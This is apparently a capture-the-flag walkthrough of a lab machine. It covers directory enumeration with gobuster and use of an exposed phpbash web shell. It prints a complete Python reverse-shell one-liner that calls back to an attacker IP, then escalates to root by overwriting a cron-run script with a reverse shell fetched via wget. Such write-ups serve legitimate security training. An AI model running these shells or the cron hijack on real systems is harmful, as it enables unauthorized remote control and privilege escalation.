nmap scan found that there is one open port, which is the port 80
Since it was a http server, I navigated to the web page of target ip address.
I didn’t find much interesting information on the web page, so I decided to gather more by using gobuster with the following command:
gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,js,py,html,db,xml,sh,txt
gobuster found many interesting directories, but the directory, /dev caught my eye because it included this file phpbash.php where I could run some bash commands.
obtaining the user flag wasn’t that hard since I found the phpbash. I just had to navigate to the proper user directory.
The problem was gaining the root user access. You guessed it. Time for privilege escalation.
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.51",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
The phpbash was very useful but it was very limited. Therefore, I decided to pop a reverse shell using the python command above.
successfully popped the reverse shell.
The sudo -l
command display a list of commands you are allowed to run with sudo
.
(scriptmanager : scriptmanager)
means the user can run ALL
commands as the user, scriptmanager.
after gaining the scriptmanager
user shell by running sudo -u scriptmanager /bin/bash
command, I explored the directories. I found a suspicious directory, /scripts, there were two files inside it. One is test.py and the other is test.txt. As you could see from the screenshot above, the former is owned by scriptmanager and the latter is owned by root.
The content of the test.py is a python program that writes into test.txt file. Also as you could see from the screenshot above, the date format of the test.txt file is a bit different from the test.py file.
running another ls -la
command confirmed that my suspicious was true. There exists a cronjob that is scheduled to execute the test.py file and write to the test.txt file.
cronjob is a scheduled task in Unix-like operating systems that is executed automatically at specified intervals. It is widely used for automating repetitive tasks, such as system maintenance, backups, updates, or running scripts.
Since I know there exists a cronjob that executes the test.py file, I can replace the file with a python reverse shell code with the same file name. The screenshot above is the code. It is the exact same code I previously had used except I changed the port to 2222 since I was already using the port 1234 to pop the original reverse shell.
It’s important not to forget to make the file executable.
The command starts a simple http server in the directory where the command is executed. This means that any files in that directory will be accessible over HTTP.
Back to the scriptmanager shell, I removed the original test.py file to replace it over with my file that contains the reverse shell code.
Transferred the file over using the wget
command.
Within a minute (because the cronjob is set to run every minute), I was connected to the root shell and captured the root flag.